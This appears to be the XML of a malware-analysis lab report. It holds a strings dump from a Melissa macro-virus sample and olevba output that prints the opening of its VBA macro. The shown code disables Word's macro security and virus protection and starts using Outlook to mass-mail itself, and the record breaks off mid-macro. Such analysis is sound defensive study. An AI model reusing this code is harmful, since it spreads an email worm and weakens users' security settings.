    <w:p w14:paraId="454C9766" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>ing all (my  ]t</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26590EE8" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>. l G0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="419D8E82" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>'m outta4 h</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5470DBDB" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>000000000046}#8.0#409#C:\Program Files\Microsoft Office\Office\MSWORD8.OLB#Microsoft Word 8.0 Object Library</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08AF371B" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>*\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\WINNT\System32\StdOle2.Tlb#OLE Automation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E1B26B" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>*\G{869793F3-3216-11D4-A5B4-0050DAD672F0}#2.0#0#C:\WINNT\System32\MSForms.twd#Microsoft Forms 2.0 Object Library</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="218681C6" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>*\G{869793F4-3216-11D4-A5B4-0050DAD672F0}#2.0#0#C:\TEMP\VBE\MSForms.exd#Microsoft Forms 2.0 Object Library</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="402D46AC" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>*\CNormal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23FD01BD" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>*\CNormal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C386D8D" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>*\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.0#0#C:\Program Files\Microsoft Office\Office\MSO97.DLL#Microsoft Office 8.0 Object Library</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BCF9569" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>Melissa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A3B928" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>841c13c29</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35030F78" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>WordS1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51754390" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>VBA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AADC468" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>Win16</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17547C23" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>Win32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F2B0097" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>Mac</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC26B55" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>8 kwietnia</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="709C8AD8" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>stdole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4087810C" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>MSFormsC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="296E7783" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>ThisDocument&lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DEBA161" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>_Evaluate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239AAFFA" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>Normal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="005DC3F8" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>Office</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2833B2C6" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>Project-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="625E19D0" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>MelissaQ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F113E84" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>Documentj</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="639834C1" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>Document_Open</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="612CB20B" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>System</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB73959" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>PrivateProfileString[</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="321FCDA5" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>CommandBars</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09210345" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>Controls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="528716C0" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>Enabled</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2380B5CB" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>Options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BCAF1C2" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>ConfirmConversions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A95E1E" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>VirusProtectionoD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="238C790C" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>SaveNormalPrompt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F0C7429" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>UngaDasOutlookH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD12893" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>DasMapiNameg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="220E8DE2" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>BreakUmOffASlice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2365E1F5" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>CreateObject</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="169A3917" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>GetNameSpaceC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="358CECF7" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>Logon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A6B8FC0" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>AddressLists</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B76B8A8" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>Count0v</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6496BAE7" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>AddyBook</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="058D20C4" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>CreateItem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="122EA173" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>AddressEntries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F46CA1" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>Peeps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F82AA4" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>Recipients</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23889A5D" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>Add</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A96B1E2" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>SubjectRP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12330B9D" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B5137B6" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>UserName\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D32B5F" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>Bodyp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11337E5B" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>Attachments_</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F832E4A" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>ActiveDocument</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6693C6CA" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>FullName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E3E219A" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>Send</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="409BF234" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>LogoffQ8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A785E4" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>ADI1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC83CDD" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>VBProjectOh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED3DD9A" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>VBComponents</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E92567" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>Item</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4CACB2" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>NTI1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5789FF0E" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>NormalTemplateq</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="640AA67B" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>NTCL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A1BA31" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>CodeModule</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6270A6CA" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>CountOfLines!\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16BB8E0B" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>ADCL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3444FCBC" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>BGN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A08FBD" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>DeleteLines</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB71E87" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>ToInfect</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B1AE4DB" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>DoAD(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21CA67CC" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>DoNT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CFCC676" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>CYA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38569667" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>Lines</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD4B8DE" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>AddFromString</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C5197B" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>InsertLines</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F6F4ED7" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>SaveAsf;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C3048B4" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>FileNamej</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3361D684" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>Savedd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B6F577A" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>Day</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="097BAEC7" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Now&amp;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68ECB865" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>Minuteam</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6AEC0E" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>SelectionZ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CEECE79" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>TypeTextw</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4073B553" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>ID="{9C82D66F-4F2F-11D9-AB8F-0050DAD672F0}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="320001ED" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>Document=Melissa/&amp;H00000000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4556B398" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>Name="Project"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A34A789" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>HelpContextID="0"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="410BFA07" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>CMG="EEEC1307EF1BD91FD91FD91FD91F"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0383AE6C" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>DPB="DCDE2135E122E222E222"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC70A79" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>GC="CAC8372B242C242CDB"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E9A85D" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>[Host Extender Info]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29ECBA8C" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>&amp;H00000001={3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&amp;H00000000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79BD60A0" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>[Workspace]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7130DD2C" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>Melissa=0, 0, 0, 0, C</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA1D558" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>Melissa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D82949F" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>Melissa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="058C50C9" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>Dokument programu Microsoft Offi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7303EB42" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>CompObj</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="786544AD" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>ce Word</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60088ADF" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>MSWordDoc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A07386E" w14:textId="59330FAE" w:rsidR="00A364DB" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>Word.Document.8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16ED6C1E" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="143F3DD0" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128"/>
    <w:p w14:paraId="30CD3564" w14:textId="4B85FE5E" w:rsidR="009E2FD7" w:rsidRDefault="009E2FD7" w:rsidP="007F0128"/>
    <w:p w14:paraId="7F6FA999" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>olevba 0.60 on Python 3.7.9 - http://decalage.info/python/oletools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79CA5807" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>===============================================================================</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="629FF1B6" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>FILE: sample_lab6_18_sep</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D08C5FC" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>Type: OLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A0197B" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>-------------------------------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CFE61B8" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">VBA MACRO Melissa.cls </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F7A81C" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>in file: sample_lab6_18_sep - OLE stream: 'Macros/VBA/Melissa'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F912F7" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26594A93" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>Private Sub Document_Open()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A8EAFC2" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>On Error Resume Next</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF994D2" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") &lt;&gt; "" Then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27CF12FC" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>CommandBars("Macro").Controls("Security...").Enabled = False</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E180717" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&amp;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD4EA61" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>Else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="253049BB" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>CommandBars("Tools").Controls("Macro").Enabled = False</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48895124" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1): Options.SaveNormalPrompt = (1 - 1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56FAB37C" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>End If</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC47AFB" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EAECE59" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>Set UngaDasOutlook = CreateObject("Outlook.Application")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="632ED3AB" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="167B2ED3" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") &lt;&gt; "... by Kwyjibo" Then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC0171E" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>If UngaDasOutlook = "Outlook" Then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A4391CB" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>DasMapiName.Logon "profile", "password"</w:t>
      </w:r>
